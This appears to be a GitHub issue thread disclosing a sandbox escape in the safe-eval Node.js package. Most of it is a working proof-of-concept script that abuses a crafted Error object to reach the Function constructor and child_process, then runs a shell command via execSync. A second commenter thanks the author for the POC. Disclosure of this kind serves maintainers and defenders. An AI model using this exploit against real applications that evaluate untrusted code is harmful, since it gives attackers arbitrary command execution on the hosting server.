Sandbox Escape

[a0xnirudh]

The following script can lead to safe-eval sandbox escape (node v12.13.0):

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Inspired from @XmiliaH 's vm2 escape.

[S4lt5]

@a0xnirudh Appreciate the POC. I knew you could get mainModule but did not realize the require call was so straightforward.